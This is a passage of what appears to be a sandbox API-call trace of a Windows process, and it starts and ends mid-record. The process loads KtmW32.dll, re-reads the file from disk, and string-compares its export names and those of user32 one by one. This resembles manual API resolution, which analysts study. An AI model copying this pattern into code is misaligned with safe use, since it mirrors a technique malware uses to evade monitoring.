lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="BeginDeferWindowPos") returned 1 [0242.019] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="BeginPaint") returned 1 [0242.019] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="BlockInput") returned 1 [0242.019] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="BringWindowToTop") returned 1 [0242.019] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="BroadcastSystemMessage") returned 1 [0242.019] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="BroadcastSystemMessageA") returned 0 [0242.019] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="ActivateKeyboardLayout") returned 1 [0242.019] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="AddClipboardFormatListener") returned 1 [0242.019] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="AdjustWindowRect") returned 1 [0242.019] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="AdjustWindowRectEx") returned 1 [0242.019] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="AlignRects") returned 1 [0242.019] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="AllowForegroundActivation") returned 1 [0242.019] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="AllowSetForegroundWindow") returned 1 [0242.019] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="AnimateWindow") returned 1 [0242.019] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="AnyPopup") returned 1 [0242.019] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="AppendMenuA") returned 1 [0242.019] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="AppendMenuW") returned 1 [0242.019] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="ArrangeIconicWindows") returned 1 [0242.020] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="AttachThreadInput") returned 1 [0242.020] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="BeginDeferWindowPos") returned 1 [0242.020] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="BeginPaint") returned 1 [0242.020] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="BlockInput") returned 1 [0242.020] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="BringWindowToTop") returned 1 [0242.020] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="BroadcastSystemMessage") returned 1 [0242.020] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="BroadcastSystemMessageA") returned 1 [0242.020] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="BroadcastSystemMessageExA") returned 0 [0242.020] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="ActivateKeyboardLayout") returned 1 [0242.020] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="AddClipboardFormatListener") returned 1 [0242.020] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="AdjustWindowRect") returned 1 [0242.020] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="AdjustWindowRectEx") returned 1 [0242.020] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="AlignRects") returned 1 [0242.020] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="AllowForegroundActivation") returned 1 [0242.020] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="AllowSetForegroundWindow") returned 1 [0242.020] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="AnimateWindow") returned 1 [0242.020] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="AnyPopup") returned 1 [0242.020] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="AppendMenuA") returned 1 [0242.020] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="AppendMenuW") returned 1 [0242.020] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="ArrangeIconicWindows") returned 1 [0242.020] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="AttachThreadInput") returned 1 [0242.020] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="BeginDeferWindowPos") returned 1 [0242.020] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="BeginPaint") returned 1 [0242.021] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="BlockInput") returned 1 [0242.021] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="BringWindowToTop") returned 1 [0242.021] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="BroadcastSystemMessage") returned 1 [0242.021] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="BroadcastSystemMessageA") returned 1 [0242.021] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="BroadcastSystemMessageExA") returned 1 [0242.021] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="BroadcastSystemMessageExW") returned 0 [0242.021] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="ActivateKeyboardLayout") returned 1 [0242.021] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="AddClipboardFormatListener") returned 1 [0242.021] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="AdjustWindowRect") returned 1 [0242.021] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="AdjustWindowRectEx") returned 1 [0242.021] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="AlignRects") returned 1 [0242.021] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="AllowForegroundActivation") returned 1 [0242.021] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="AllowSetForegroundWindow") returned 1 [0242.021] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="AnimateWindow") returned 1 [0242.021] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="AnyPopup") returned 1 [0242.021] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="AppendMenuA") returned 1 [0242.021] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="AppendMenuW") returned 1 [0242.021] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="ArrangeIconicWindows") returned 1 [0242.021] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="AttachThreadInput") returned 1 [0242.021] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="BeginDeferWindowPos") returned 1 [0242.021] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="BeginPaint") returned 1 [0242.021] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="BlockInput") returned 1 [0242.021] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="BringWindowToTop") returned 1 [0242.021] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="BroadcastSystemMessage") returned 1 [0242.899] GetProcessHeap () returned 0x550000 [0242.899] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x412e040 | out: hHeap=0x550000) returned 1 [0242.906] GetProcessHeap () returned 0x550000 [0242.906] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x10) returned 0x569230 [0242.906] LoadLibraryA (lpLibFileName="KtmW32.dll") returned 0x7ffc4bf10000 [0242.911] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleFileNameA") returned 0x7ffc5ecf6e30 [0242.911] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CreateFileA") returned 0x7ffc5ecfd8a0 [0242.911] GetModuleFileNameA (in: hModule=0x7ffc4bf10000, lpFilename=0x14f5d0, nSize=0x104 | out: lpFilename="C:\\Windows\\SYSTEM32\\KtmW32.dll" (normalized: "c:\\windows\\system32\\ktmw32.dll")) returned 0x1e [0242.912] CreateFileA (lpFileName="C:\\Windows\\SYSTEM32\\KtmW32.dll" (normalized: "c:\\windows\\system32\\ktmw32.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x17c [0242.912] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetFileSizeEx") returned 0x7ffc5ecfdaa0 [0242.913] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CloseHandle") returned 0x7ffc5ecfd650 [0242.913] GetFileSizeEx (in: hFile=0x17c, lpFileSize=0x14f5b0 | out: lpFileSize=0x14f5b0*=24064) returned 1 [0242.913] GetProcessHeap () returned 0x550000 [0242.913] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x5e00) returned 0x2d65030 [0242.913] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadFile") returned 0x7ffc5ecfdbd0 [0242.913] ReadFile (in: hFile=0x17c, lpBuffer=0x2d65030, nNumberOfBytesToRead=0x5e00, lpNumberOfBytesRead=0x14f5a4, lpOverlapped=0x0 | out: lpBuffer=0x2d65030*, lpNumberOfBytesRead=0x14f5a4*=0x5e00, lpOverlapped=0x0) returned 1 [0242.914] CloseHandle (hObject=0x17c) returned 1 [0242.914] lstrcmpA (lpString1="CommitComplete", lpString2="CommitComplete") returned 0 [0242.914] lstrcmpA (lpString1="CommitEnlistment", lpString2="CommitComplete") returned 1 [0242.914] lstrcmpA (lpString1="CommitEnlistment", lpString2="CommitEnlistment") returned 0 [0242.914] lstrcmpA (lpString1="CommitTransaction", lpString2="CommitComplete") returned 1 [0242.914] lstrcmpA (lpString1="CommitTransaction", lpString2="CommitEnlistment") returned 1 [0242.914] lstrcmpA (lpString1="CommitTransaction", lpString2="CommitTransaction") returned 0 [0242.914] lstrcmpA (lpString1="CommitTransactionAsync", lpString2="CommitComplete") returned 1 [0242.914] lstrcmpA (lpString1="CommitTransactionAsync", lpString2="CommitEnlistment") returned 1 [0242.914] lstrcmpA (lpString1="CommitTransactionAsync", lpString2="CommitTransaction") returned 1 [0242.914] lstrcmpA (lpString1="CommitTransactionAsync", lpString2="CommitTransactionAsync") returned 0 [0242.914] lstrcmpA (lpString1="CreateEnlistment", lpString2="CommitComplete") returned 1 [0242.914] lstrcmpA (lpString1="CreateEnlistment", lpString2="CommitEnlistment") returned 1 [0242.914] lstrcmpA (lpString1="CreateEnlistment", lpString2="CommitTransaction") returned 1 [0242.914] lstrcmpA (lpString1="CreateEnlistment", lpString2="CommitTransactionAsync") returned 1 [0242.914] lstrcmpA (lpString1="CreateEnlistment", lpString2="CreateEnlistment") returned 0 [0242.914] lstrcmpA (lpString1="CreateResourceManager", lpString2="CommitComplete") returned 1 [0242.914] lstrcmpA (lpString1="CreateResourceManager", lpString2="CommitEnlistment") returned 1 [0242.914] lstrcmpA (lpString1="CreateResourceManager", lpString2="CommitTransaction") returned 1 [0242.914] lstrcmpA (lpString1="CreateResourceManager", lpString2="CommitTransactionAsync") returned 1 [0242.914] lstrcmpA (lpString1="CreateResourceManager", lpString2="CreateEnlistment") returned 1 [0242.915] lstrcmpA (lpString1="CreateResourceManager", lpString2="CreateResourceManager") returned 0 [0242.915] lstrcmpA (lpString1="CreateTransaction", lpString2="CommitComplete") returned 1 [0242.915] lstrcmpA (lpString1="CreateTransaction", lpString2="CommitEnlistment") returned 1 [0242.915] lstrcmpA (lpString1="CreateTransaction", lpString2="CommitTransaction") returned 1 [0242.915] lstrcmpA (lpString1="CreateTransaction", lpString2="CommitTransactionAsync") returned 1 [0242.915] lstrcmpA (lpString1="CreateTransaction", lpString2="CreateEnlistment") returned 1 [0242.915] lstrcmpA (lpString1="CreateTransaction", lpString2="CreateResourceManager") returned 1 [0242.915] lstrcmpA (lpString1="CreateTransaction", lpString2="CreateTransaction") returned 0 [0242.915] lstrcmpA (lpString1="CreateTransactionManager", lpString2="CommitComplete") returned 1 [0242.915] lstrcmpA (lpString1="CreateTransactionManager", lpString2="CommitEnlistment") returned 1 [0242.915] lstrcmpA (lpString1="CreateTransactionManager", lpString2="CommitTransaction") returned 1 [0242.915] lstrcmpA (lpString1="CreateTransactionManager", lpString2="CommitTransactionAsync") returned 1 [0242.915] lstrcmpA (lpString1="CreateTransactionManager", lpString2="CreateEnlistment") returned 1 [0242.915] lstrcmpA (lpString1="CreateTransactionManager", lpString2="CreateResourceManager") returned 1 [0242.915] lstrcmpA (lpString1="CreateTransactionManager", lpString2="CreateTransaction") returned 1 [0242.915] lstrcmpA (lpString1="CreateTransactionManager", lpString2="CreateTransactionManager") returned 0 [0242.915] lstrcmpA (lpString1="GetCurrentClockTransactionManager", lpString2="CommitComplete") returned 1 [0242.915] lstrcmpA (lpString1="GetCurrentClockTransactionManager", lpString2="CommitEnlistment") returned 1 [0242.915] lstrcmpA (lpString1="GetCurrentClockTransactionManager", lpString2="CommitTransaction") returned 1 [0242.915] lstrcmpA (lpString1="GetCurrentClockTransactionManager", lpString2="CommitTransactionAsync") returned 1 [0242.915] lstrcmpA (lpString1="GetCurrentClockTransactionManager", lpString2="CreateEnlistment") returned 1 [0242.915] lstrcmpA (lpString1="GetCurrentClockTransactionManager", lpString2="CreateResourceManager") returned 1 [0242.915] lstrcmpA (lpString1="GetCurrentClockTransactionManager", lpString2="CreateTransaction") returned 1 [0242.915] lstrcmpA (lpString1="GetCurrentClockTransactionManager", lpString2="CreateTransactionManager") returned 1 [0242.915] lstrcmpA (lpString1="GetCurrentClockTransactionManager", lpString2="GetCurrentClockTransactionManager") returned 0 [0242.915] lstrcmpA (lpString1="GetEnlistmentId", lpString2="CommitComplete") returned 1 [0242.915] lstrcmpA (lpString1="GetEnlistmentId", lpString2="CommitEnlistment") returned 1 [0242.915] lstrcmpA (lpString1="GetEnlistmentId", lpString2="CommitTransaction") returned 1 [0242.916] lstrcmpA (lpString1="GetEnlistmentId", lpString2="CommitTransactionAsync") returned 1 [0242.916] lstrcmpA (lpString1="GetEnlistmentId", lpString2="CreateEnlistment") returned 1 [0242.916] lstrcmpA (lpString1="GetEnlistmentId", lpString2="CreateResourceManager") returned 1 [0242.916] lstrcmpA (lpString1="GetEnlistmentId", lpString2="CreateTransaction") returned 1 [0242.916] lstrcmpA (lpString1="GetEnlistmentId", lpString2="CreateTransactionManager") returned 1 [0242.916] lstrcmpA (lpString1="GetEnlistmentId", lpString2="GetCurrentClockTransactionManager") returned 1 [0242.916] lstrcmpA (lpString1="GetEnlistmentId", lpString2="GetEnlistmentId") returned 0 [0242.916] lstrcmpA (lpString1="GetEnlistmentRecoveryInformation", lpString2="CommitComplete") returned 1 [0242.916] lstrcmpA (lpString1="GetEnlistmentRecoveryInformation", lpString2="CommitEnlistment") returned 1 [0242.916] lstrcmpA (lpString1="GetEnlistmentRecoveryInformation", lpString2="CommitTransaction") returned 1 [0242.916] lstrcmpA (lpString1="GetEnlistmentRecoveryInformation", lpString2="CommitTransactionAsync") returned 1 [0242.916] lstrcmpA (lpString1="GetEnlistmentRecoveryInformation", lpString2="CreateEnlistment") returned 1 [0242.916] lstrcmpA (lpString1="GetEnlistmentRecoveryInformation", lpString2="CreateResourceManager") returned 1 [0242.916] lstrcmpA (lpString1="GetEnlistmentRecoveryInformation", lpString2="CreateTransaction") returned 1 [0242.916] lstrcmpA (lpString1="GetEnlistmentRecoveryInformation", lpString2="CreateTransactionManager") returned 1 [0242.916] lstrcmpA (lpString1="GetEnlistmentRecoveryInformation", lpString2="GetCurrentClockTransactionManager") returned 1 [0242.916] lstrcmpA (lpString1="GetEnlistmentRecoveryInformation", lpString2="GetEnlistmentId") returned 1 [0242.916] lstrcmpA (lpString1="GetEnlistmentRecoveryInformation", lpString2="GetEnlistmentRecoveryInformation") returned 0 [0242.916] lstrcmpA (lpString1="GetNotificationResourceManager", lpString2="CommitComplete") returned 1 [0242.916] lstrcmpA (lpString1="GetNotificationResourceManager", lpString2="CommitEnlistment") returned 1 [0242.916] lstrcmpA (lpString1="GetNotificationResourceManager", lpString2="CommitTransaction") returned 1 [0242.916] lstrcmpA (lpString1="GetNotificationResourceManager", lpString2="CommitTransactionAsync") returned 1 [0242.916] lstrcmpA (lpString1="GetNotificationResourceManager", lpString2="CreateEnlistment") returned 1 [0242.916] lstrcmpA (lpString1="GetNotificationResourceManager", lpString2="CreateResourceManager") returned 1 [0242.916] lstrcmpA (lpString1="GetNotificationResourceManager", lpString2="CreateTransaction") returned 1 [0242.916] lstrcmpA (lpString1="GetNotificationResourceManager", lpString2="CreateTransactionManager") returned 1 [0242.916] lstrcmpA (lpString1="GetNotificationResourceManager", lpString2="GetCurrentClockTransactionManager") returned 1 [0242.916] lstrcmpA (lpString1="GetNotificationResourceManager", lpString2="GetEnlistmentId") returned 1 [0242.916] lstrcmpA (lpString1="GetNotificationResourceManager", lpString2="GetEnlistmentRecoveryInformation") returned 1 [0242.916] lstrcmpA (lpString1="GetNotificationResourceManager", lpString2="GetNotificationResourceManager") returned 0 [0242.917] lstrcmpA (lpString1="GetNotificationResourceManagerAsync", lpString2="CommitComplete") returned 1 [0242.917] lstrcmpA (lpString1="GetNotificationResourceManagerAsync", lpString2="CommitEnlistment") returned 1 [0243.089] lstrcmpA (lpString1="GetNotificationResourceManagerAsync", lpString2="CommitTransaction") returned 1 [0243.089] lstrcmpA (lpString1="GetNotificationResourceManagerAsync", lpString2="CommitTransactionAsync") returned 1 [0243.090] lstrcmpA (lpString1="GetNotificationResourceManagerAsync", lpString2="CreateEnlistment") returned 1 [0243.090] lstrcmpA (lpString1="GetNotificationResourceManagerAsync", lpString2="CreateResourceManager") returned 1 [0243.090] lstrcmpA (lpString1="GetNotificationResourceManagerAsync", lpString2="CreateTransaction") returned 1 [0243.090] lstrcmpA (lpString1="GetNotificationResourceManagerAsync", lpString2="CreateTransactionManager") returned 1 [0243.090] lstrcmpA (lpString1="GetNotificationResourceManagerAsync", lpString2="GetCurrentClockTransactionManager") returned 1 [0243.090] lstrcmpA (lpString1="GetNotificationResourceManagerAsync", lpString2="GetEnlistmentId") returned 1 [0243.090] lstrcmpA (lpString1="GetNotificationResourceManagerAsync", lpString2="GetEnlistmentRecoveryInformation") returned 1 [0243.090] lstrcmpA (lpString1="GetNotificationResourceManagerAsync", lpString2="GetNotificationResourceManager") returned 1 [0243.090] lstrcmpA (lpString1="GetNotificationResourceManagerAsync", lpString2="GetNotificationResourceManagerAsync") returned 0 [0243.090] lstrcmpA (lpString1="GetTransactionId", lpString2="CommitComplete") returned 1 [0243.090] lstrcmpA (lpString1="GetTransactionId", lpString2="CommitEnlistment") returned 1 [0243.090] lstrcmpA (lpString1="GetTransactionId", lpString2="CommitTransaction") returned 1 [0243.090] lstrcmpA (lpString1="GetTransactionId", lpString2="CommitTransactionAsync") returned 1 [0243.090] lstrcmpA (lpString1="GetTransactionId", lpString2="CreateEnlistment") returned 1 [0243.090] lstrcmpA (lpString1="GetTransactionId", lpString2="CreateResourceManager") returned 1 [0243.090] lstrcmpA (lpString1="GetTransactionId", lpString2="CreateTransaction") returned 1 [0243.090] lstrcmpA (lpString1="GetTransactionId", lpString2="CreateTransactionManager") returned 1 [0243.090] lstrcmpA (lpString1="GetTransactionId", lpString2="GetCurrentClockTransactionManager") returned 1 [0243.090] lstrcmpA (lpString1="GetTransactionId", lpString2="GetEnlistmentId") returned 1 [0243.090] lstrcmpA (lpString1="GetTransactionId", lpString2="GetEnlistmentRecoveryInformation") returned 1 [0243.090] lstrcmpA (lpString1="GetTransactionId", lpString2="GetNotificationResourceManager") returned 1 [0243.090] lstrcmpA (lpString1="GetTransactionId", lpString2="GetNotificationResourceManagerAsync") returned 1 [0243.091] lstrcmpA (lpString1="GetTransactionId", lpString2="GetTransactionId") returned 0 [0243.091] lstrcmpA (lpString1="GetTransactionInformation", lpString2="CommitComplete") returned 1 [0243.091] lstrcmpA (lpString1="GetTransactionInformation", lpString2="CommitEnlistment") returned 1 [0243.091] lstrcmpA (lpString1="GetTransactionInformation", lpString2="CommitTransaction") returned 1 [0243.091] lstrcmpA (lpString1="GetTransactionInformation", lpString2="CommitTransactionAsync") returned 1 [0243.091] lstrcmpA (lpString1="GetTransactionInformation", lpString2="CreateEnlistment") returned 1 [0243.091] lstrcmpA (lpString1="GetTransactionInformation", lpString2="CreateResourceManager") returned 1 [0243.091] lstrcmpA (lpString1="GetTransactionInformation", lpString2="CreateTransaction") returned 1 [0243.091] lstrcmpA (lpString1="GetTransactionInformation", lpString2="CreateTransactionManager") returned 1 [0243.091] lstrcmpA (lpString1="GetTransactionInformation", lpString2="GetCurrentClockTransactionManager") returned 1 [0243.091] lstrcmpA (lpString1="GetTransactionInformation", lpString2="GetEnlistmentId") returned 1 [0243.091] lstrcmpA (lpString1="GetTransactionInformation", lpString2="GetEnlistmentRecoveryInformation") returned 1 [0243.091] lstrcmpA (lpString1="GetTransactionInformation", lpString2="GetNotificationResourceManager") returned 1 [0243.091] lstrcmpA (lpString1="GetTransactionInformation", lpString2="GetNotificationResourceManagerAsync") returned 1 [0243.091] lstrcmpA (lpString1="GetTransactionInformation", lpString2="GetTransactionId") returned 1 [0243.091] lstrcmpA (lpString1="GetTransactionInformation", lpString2="GetTransactionInformation") returned 0 [0243.091] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="CommitComplete") returned 1 [0243.091] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="CommitEnlistment") returned 1 [0243.091] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="CommitTransaction") returned 1 [0243.091] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="CommitTransactionAsync") returned 1 [0243.091] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="CreateEnlistment") returned 1 [0243.091] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="CreateResourceManager") returned 1 [0243.091] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="CreateTransaction") returned 1 [0243.091] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="CreateTransactionManager") returned 1 [0243.092] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="GetCurrentClockTransactionManager") returned 1 [0243.092] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="GetEnlistmentId") returned 1 [0243.092] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="GetEnlistmentRecoveryInformation") returned 1 [0243.092] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="GetNotificationResourceManager") returned 1 [0243.092] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="GetNotificationResourceManagerAsync") returned 1 [0243.092] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="GetTransactionId") returned 1 [0243.092] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="GetTransactionInformation") returned 1 [0243.092] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="GetTransactionManagerId") returned 0 [0243.092] lstrcmpA (lpString1="OpenEnlistment", lpString2="CommitComplete") returned 1 [0243.092] lstrcmpA (lpString1="OpenEnlistment", lpString2="CommitEnlistment") returned 1 [0243.092] lstrcmpA (lpString1="OpenEnlistment", lpString2="CommitTransaction") returned 1 [0243.092] lstrcmpA (lpString1="OpenEnlistment", lpString2="CommitTransactionAsync") returned 1 [0243.092] lstrcmpA (lpString1="OpenEnlistment", lpString2="CreateEnlistment") returned 1 [0243.092] lstrcmpA (lpString1="OpenEnlistment", lpString2="CreateResourceManager") returned 1 [0243.092] lstrcmpA (lpString1="OpenEnlistment", lpString2="CreateTransaction") returned 1 [0243.092] lstrcmpA (lpString1="OpenEnlistment", lpString2="CreateTransactionManager") returned 1 [0243.092] lstrcmpA (lpString1="OpenEnlistment", lpString2="GetCurrentClockTransactionManager") returned 1 [0243.092] lstrcmpA (lpString1="OpenEnlistment", lpString2="GetEnlistmentId") returned 1 [0243.092] lstrcmpA (lpString1="OpenEnlistment", lpString2="GetEnlistmentRecoveryInformation") returned 1 [0243.092] lstrcmpA (lpString1="OpenEnlistment", lpString2="GetNotificationResourceManager") returned 1 [0243.092] lstrcmpA (lpString1="OpenEnlistment", lpString2="GetNotificationResourceManagerAsync") returned 1 [0243.092] lstrcmpA (lpString1="OpenEnlistment", lpString2="GetTransactionId") returned 1 [0243.092] lstrcmpA (lpString1="OpenEnlistment", lpString2="GetTransactionInformation") returned 1 [0243.092] lstrcmpA (lpString1="OpenEnlistment", lpString2="GetTransactionManagerId") returned 1 [0243.092] lstrcmpA (lpString1="OpenEnlistment", lpString2="OpenEnlistment") returned 0 [0243.092] lstrcmpA (lpString1="OpenResourceManager", lpString2="CommitComplete") returned 1 [0243.092] lstrcmpA (lpString1="OpenResourceManager", lpString2="CommitEnlistment") returned 1 [0243.092] lstrcmpA (lpString1="OpenResourceManager", lpString2="CommitTransaction") returned 1 [0243.092] lstrcmpA (lpString1="OpenResourceManager", lpString2="CommitTransactionAsync") returned 1 [0243.093] lstrcmpA (lpString1="OpenResourceManager", lpString2="CreateEnlistment") returned 1 [0243.093] lstrcmpA (lpString1="OpenResourceManager", lpString2="CreateResourceManager") returned 1 [0243.093] lstrcmpA (lpString1="OpenResourceManager", lpString2="CreateTransaction") returned 1 [0243.093] lstrcmpA (lpString1="OpenResourceManager", lpString2="CreateTransactionManager") returned 1 [0243.093] lstrcmpA (lpString1="OpenResourceManager", lpString2="GetCurrentClockTransactionManager") returned 1 [0243.093] lstrcmpA (lpString1="OpenResourceManager", lpString2="GetEnlistmentId") returned 1 [0243.093] lstrcmpA (lpString1="OpenResourceManager", lpString2="GetEnlistmentRecoveryInformation") returned 1 [0243.093] lstrcmpA (lpString1="OpenResourceManager", lpString2="GetNotificationResourceManager") returned 1 [0243.093] lstrcmpA (lpString1="OpenResourceManager", lpString2="GetNotificationResourceManagerAsync") returned 1 [0243.093] lstrcmpA (lpString1="OpenResourceManager", lpString2="GetTransactionId") returned 1 [0243.093] lstrcmpA (lpString1="OpenResourceManager", lpString2="GetTransactionInformation") returned 1 [0243.093] lstrcmpA (lpString1="OpenResourceManager", lpString2="GetTransactionManagerId") returned 1 [0243.093] lstrcmpA (lpString1="OpenResourceManager", lpString2="OpenEnlistment") returned 1 [0243.093] lstrcmpA (lpString1="OpenResourceManager", lpString2="OpenResourceManager") returned 0 [0243.093] lstrcmpA (lpString1="OpenTransaction", lpString2="CommitComplete") returned 1 [0243.093] lstrcmpA (lpString1="OpenTransaction", lpString2="CommitEnlistment") returned 1 [0243.093] lstrcmpA (lpString1="OpenTransaction", lpString2="CommitTransaction") returned 1 [0243.093] lstrcmpA (lpString1="OpenTransaction", lpString2="CommitTransactionAsync") returned 1 [0243.093] lstrcmpA (lpString1="OpenTransaction", lpString2="CreateEnlistment") returned 1 [0243.093] lstrcmpA (lpString1="OpenTransaction", lpString2="CreateResourceManager") returned 1 [0243.093] lstrcmpA (lpString1="OpenTransaction", lpString2="CreateTransaction") returned 1 [0243.093] lstrcmpA (lpString1="OpenTransaction", lpString2="CreateTransactionManager") returned 1 [0243.093] lstrcmpA (lpString1="OpenTransaction", lpString2="GetCurrentClockTransactionManager") returned 1 [0243.093] lstrcmpA (lpString1="OpenTransaction", lpString2="GetEnlistmentId") returned 1 [0243.093] lstrcmpA (lpString1="OpenTransaction", lpString2="GetEnlistmentRecoveryInformation") returned 1 [0243.094] lstrcmpA (lpString1="OpenTransaction", lpString2="GetNotificationResourceManager") returned 1 [0243.094] lstrcmpA (lpString1="OpenTransaction", lpString2="GetNotificationResourceManagerAsync") returned 1 [0243.094] lstrcmpA (lpString1="OpenTransaction", lpString2="GetTransactionId") returned 1 [0243.094] lstrcmpA (lpString1="OpenTransaction", lpString2="GetTransactionInformation") returned 1 [0243.094] lstrcmpA (lpString1="OpenTransaction", lpString2="GetTransactionManagerId") returned 1 [0243.094] lstrcmpA (lpString1="OpenTransaction", lpString2="OpenEnlistment") returned 1 [0243.094] lstrcmpA (lpString1="OpenTransaction", lpString2="OpenResourceManager") returned 1 [0243.094] lstrcmpA (lpString1="OpenTransaction", lpString2="OpenTransaction") returned 0 [0243.094] lstrcmpA (lpString1="OpenTransactionManager", lpString2="CommitComplete") returned 1 [0243.094] lstrcmpA (lpString1="OpenTransactionManager", lpString2="CommitEnlistment") returned 1 [0243.094] lstrcmpA (lpString1="OpenTransactionManager", lpString2="CommitTransaction") returned 1 [0243.094] lstrcmpA (lpString1="OpenTransactionManager", lpString2="CommitTransactionAsync") returned 1 [0243.094] lstrcmpA (lpString1="OpenTransactionManager", lpString2="CreateEnlistment") returned 1 [0243.094] lstrcmpA (lpString1="OpenTransactionManager", lpString2="CreateResourceManager") returned 1 [0243.094] lstrcmpA (lpString1="OpenTransactionManager", lpString2="CreateTransaction") returned 1 [0243.094] lstrcmpA (lpString1="OpenTransactionManager", lpString2="CreateTransactionManager") returned 1 [0243.094] lstrcmpA (lpString1="OpenTransactionManager", lpString2="GetCurrentClockTransactionManager") returned 1 [0243.094] lstrcmpA (lpString1="OpenTransactionManager", lpString2="GetEnlistmentId") returned 1 [0243.095] lstrcmpA (lpString1="OpenTransactionManager", lpString2="GetEnlistmentRecoveryInformation") returned 1 [0243.095] lstrcmpA (lpString1="OpenTransactionManager", lpString2="GetNotificationResourceManager") returned 1 [0243.095] lstrcmpA (lpString1="OpenTransactionManager", lpString2="GetNotificationResourceManagerAsync") returned 1 [0243.095] lstrcmpA (lpString1="OpenTransactionManager", lpString2="GetTransactionId") returned 1 [0243.095] lstrcmpA (lpString1="OpenTransactionManager", lpString2="GetTransactionInformation") returned 1 [0243.095] lstrcmpA (lpString1="OpenTransactionManager", lpString2="GetTransactionManagerId") returned 1 [0243.095] lstrcmpA (lpString1="OpenTransactionManager", lpString2="OpenEnlistment") returned 1 [0243.095] lstrcmpA (lpString1="OpenTransactionManager", lpString2="OpenResourceManager") returned 1 [0243.095] lstrcmpA (lpString1="OpenTransactionManager", lpString2="OpenTransaction") returned 1 [0243.095] lstrcmpA (lpString1="OpenTransactionManager", lpString2="OpenTransactionManager") returned 0 [0243.095] lstrcmpA 